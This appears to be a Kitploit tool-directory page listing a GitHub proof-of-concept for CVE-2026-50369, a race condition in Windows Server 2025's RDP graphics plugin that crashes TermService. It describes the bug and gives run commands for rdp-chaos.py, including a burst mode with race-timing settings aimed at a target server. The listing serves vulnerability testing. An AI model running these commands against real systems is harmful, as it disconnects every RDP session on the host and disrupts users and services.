Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-50369 — Proof-of-concept exploit for CVE-2026-50369, demonstrating the vulnerability and providing a working exploit for security testing and verification. | Kitploit
Ferramentas/GitHubGitHub/syxlox/cve-2026-50369
Vulnerability AnalysisExploitationPenetration Testing
GitHubsyxlox/cve-2026-50369

CVE-2026-50369

Proof-of-concept exploit for CVE-2026-50369, demonstrating the vulnerability and providing a working exploit for security testing and verification.

Ver Repositório
23há 1 mêsAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Conteúdo não disponível no idioma solicitado. Mostrando versão em inglês.

CVE-2026-50369

reproducer for a TOCTOU race condition in rdpcorets.dll!CRdpPipeGfxPlugin::Enable on Windows Server 2025 RDS Session Hosts.

i reported this as a DoS; the code-path seem to somehow also enable EoP. this reproducer is a PoC for the DoS path alone.

Bug

Enable reads a COM interface pointer at this+0x60 twice without synchronization. TerminateInstance clears the same field outside its own critical section scope. Both execute concurrently on the NT threadpool via PnP device arrival and removal work items. The second read dereferences null → access violation → TermService crash → all active RDP sessions disconnected.

root@kitploit:~
# install dependencies (Debian/Ubuntu)
sudo apt install -y freerdp3-x11 xvfb python3  # or freerdp2-x11

# create credentials file
echo -e "user1:pass1\nuser2:pass2\nuser3:pass3" > credentials.txt

# standard mode
python3 rdp-chaos.py --server <target> --creds credentials.txt

# burst mode (faster trigger)
python3 rdp-chaos.py --server <target> --creds credentials.txt \
    --burst --burst-count 16 --burst-kill-hold 0.1 --burst-race 0.030
Baixar ferramenta